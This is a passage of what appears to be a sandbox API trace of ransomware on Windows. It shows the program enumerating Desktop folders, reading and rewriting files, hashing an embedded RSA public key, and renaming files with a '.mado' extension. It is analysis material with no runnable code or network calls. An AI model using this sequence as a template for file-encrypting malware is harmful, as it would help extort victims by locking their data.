[0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0204.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0204.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0204.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe628 [0204.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.979] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10779, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.979] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.979] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.980] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.980] CloseHandle (hObject=0x63c) returned 1 [0204.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74e80 [0204.981] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\wtOOF2e1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\wtoof2e1.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\wtOOF2e1.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\wtoof2e1.bmp.mado")) returned 1 [0204.982] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5274c890, ftCreationTime.dwHighDateTime=0x1d5e613, ftLastAccessTime.dwLowDateTime=0x92c43d90, ftLastAccessTime.dwHighDateTime=0x1d5e1cc, ftLastWriteTime.dwLowDateTime=0x92c43d90, ftLastWriteTime.dwHighDateTime=0x1d5e1cc, nFileSizeHigh=0x0, nFileSizeLow=0x10779, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wtOOF2e1.bmp", cAlternateFileName="")) returned 0 [0204.982] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0204.982] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0204.982] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0204.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.982] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\") returned="sZ1h4QiinWnf\\" [0204.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0204.982] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0204.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81080 [0204.983] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0204.983] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.983] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.983] PathFindFileNameW (pszPath="") returned="" [0204.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0204.983] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72332bd0, ftCreationTime.dwHighDateTime=0x1d5dd86, ftLastAccessTime.dwLowDateTime=0xed2e1d90, ftLastAccessTime.dwHighDateTime=0x1d5e68c, ftLastWriteTime.dwLowDateTime=0xed2e1d90, ftLastWriteTime.dwHighDateTime=0x1d5e68c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0204.983] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72332bd0, ftCreationTime.dwHighDateTime=0x1d5dd86, ftLastAccessTime.dwLowDateTime=0xed2e1d90, ftLastAccessTime.dwHighDateTime=0x1d5e68c, ftLastWriteTime.dwLowDateTime=0xed2e1d90, ftLastWriteTime.dwHighDateTime=0x1d5e68c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0204.983] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11f646b0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x9aab0d0, ftLastAccessTime.dwHighDateTime=0x1d5e757, ftLastWriteTime.dwLowDateTime=0x9aab0d0, ftLastWriteTime.dwHighDateTime=0x1d5e757, nFileSizeHigh=0x0, nFileSizeLow=0x18bec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d_HC7Wx7GxjYqhQQa.gif", cAlternateFileName="D_HC7W~1.GIF")) returned 1 [0204.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0204.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0204.983] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\d_HC7Wx7GxjYqhQQa.gif") returned=".gif" [0204.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sZ1h4QiinWnf\\d_HC7Wx7GxjYqhQQa.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz1h4qiinwnf\\d_hc7wx7gxjyqhqqa.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.984] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=101356) returned 1 [0204.984] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.986] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18bc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.986] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.987] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x18bec, lpOverlapped=0x0) returned 1 [0204.988] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.988] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.988] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.989] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.989] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.989] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.989] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.989] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.989] GetLastError () returned 0x0 [0204.990] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.990] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.990] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.990] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.990] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18bf0) returned 0x3b81690 [0204.990] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81080 [0204.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b810c8 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0204.991] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0204.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0204.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe610 | out: hHeap=0x2c0000) returned 1 [0204.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe5e0 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe5c8 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eb80 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6ec98 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0204.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe610 | out: hHeap=0x2c0000) returned 1 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.992] GetCurrentThreadId () returned 0x600 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68228 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.992] GetCurrentThreadId () returned 0x600 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0204.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe610 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe628 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0204.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe640 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: 